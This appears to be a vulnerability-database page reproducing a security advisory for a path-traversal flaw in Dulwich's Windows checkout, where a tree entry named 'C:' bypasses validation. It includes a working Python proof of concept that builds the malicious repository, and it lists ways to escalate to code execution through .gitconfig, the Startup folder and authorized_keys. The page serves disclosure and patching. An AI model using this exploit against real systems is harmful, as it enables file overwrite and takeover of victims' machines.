GHSA-8mcx-5rqc-vhmfHigh· 8.8▾ TwilightDulwich: Arbitrary File Write (RCE) on Windows via Unvalidated Drive Letters in Tree Paths
▾ Twilight zone — High severity, or a signal on a lesser flaw
impact 48.4 · likelihood 0 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
dulwich/index.py (Methods: validate_path_element_ntfs, _tree_to_fs_path)dulwich/porcelain/__init__.py (Method: _checked_worktree_path)A High-severity Path Traversal vulnerability exists in Dulwich's checkout logic when running on Windows. The functions responsible for validating NTFS paths strictly reject .git variants, Alternate Data Streams (ADS), git~1 short names, and reserved device names, but they completely fail to check for DOS drive letter prefixes.
A malicious Git tree can contain an entry named C:. When Dulwich processes this tree on a Windows client, the string passes the validate_path_element_ntfs check. Later, _tree_to_fs_path passes this path to os.path.join(root, b"C:\\\\Users\\\\...").
On Windows, if the second argument to os.path.join contains an absolute drive letter, the root path is completely discarded. As a result, Dulwich writes the repository file to the absolute path outside of the intended Git worktree.
While the standard C git client explicitly blocks this via has_dos_drive_prefix() in path.c, Dulwich lacks this protection. Because Git trees are cross-platform, an attacker can author a malicious repository on Linux and wait for a Windows victim (or CI runner) to clone it.
This vulnerability allows an attacker to achieve Arbitrary File Write, which can trivially be escalated to Remote Code Execution (RCE) or total system compromise on the victim's Windows machine.
Attack vectors include:
C:\\Users\\<victim>\\.gitconfig file to set core.sshCommand to an arbitrary executable, granting RCE the next time the user interacts with Git.C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\.C:\\Users\\<victim>\\.ssh\\authorized_keys to compromise remote servers accessible by the victim.The following Python script (runnable on Linux) generates a malicious Git repository containing a payload that targets Windows clients.
from dulwich.objects import Blob, Tree, Commit
from dulwich.repo import Repo
import os, tempfile
repo_path = tempfile.mkdtemp()
repo = Repo.init(repo_path)
# 1. Build the payload blob.
blob = Blob(); blob.data = b"pwned-by-drive-letter\\n"
repo.object_store.add_object(blob)
# 2. Build the malicious tree hierarchy: C:/Users/victim/evil.txt
evil_txt = Tree(); evil_txt[b"evil.txt"] = (0o100644, blob.id)
repo.object_store.add_object(evil_txt)
victim_dir = Tree(); victim_dir[b"victim"] = (0o040000, evil_txt.id)
repo.object_store.add_object(victim_dir)
users_dir = Tree(); users_dir[b"Users"] = (0o040000, victim_dir.id)
repo.object_store.add_object(users_dir)
# VULNERABILITY: The "C:" directory bypasses validation
c_drive = Tree(); c_drive[b"C:"] = (0o040000, users_dir.id)
repo.object_store.add_object(c_drive)
commit = Commit()
commit.tree = c_drive.id
commit.message = b"add feature"
commit.author = commit.committer = b"attacker <[email protected]>"
commit.author_time = commit.commit_time = 1700000000
commit.author_timezone = commit.committer_timezone = 0
repo.object_store.add_object(commit)
repo.refs[b"refs/heads/main"] = commit.id
print(f"Malicious repo created at {repo_path}")
print(f"Clone with: dulwich clone {repo_path} /target/win/worktree")
# Result: A Windows checkout of this commit writes the payload directly to C:\\Users\\victim\\evil.txt
dulwich < 1.2.9Upgrade to a patched release:
dulwich 1.2.9Connected by shared product, vendor, weakness, or advisory.
GHSA-35mr-4567-66vgMedium· 6.5Dulwich: Infinite Loop Denial of Service (DoS) in Packfile Object Resolution
GHSA-5fqc-mrg8-w798High· 8.6Dulwich: Symlink directory traversal in filter-branch index_filter via cross-commit state persistence
GHSA-cm62-gvxx-vmxxHigh· 8.6Dulwich: Symlink directory traversal in stash pop allows arbitrary file write via intermediate directory symlinks
CVE-2026-47712Low· 3.3Dulwich doesn't sanitize commit subjects in `porcelain.format_patch`
GHSA-8w8g-wq8h-fq33High· 8.6Dulwich: Symlink write-through in checkout(paths=[]) via raw os.open bypasses all symlink protections
CVE-2026-47734Medium· 5.7Dulwich has unbounded memory allocation in receive-pack from crafted thin packs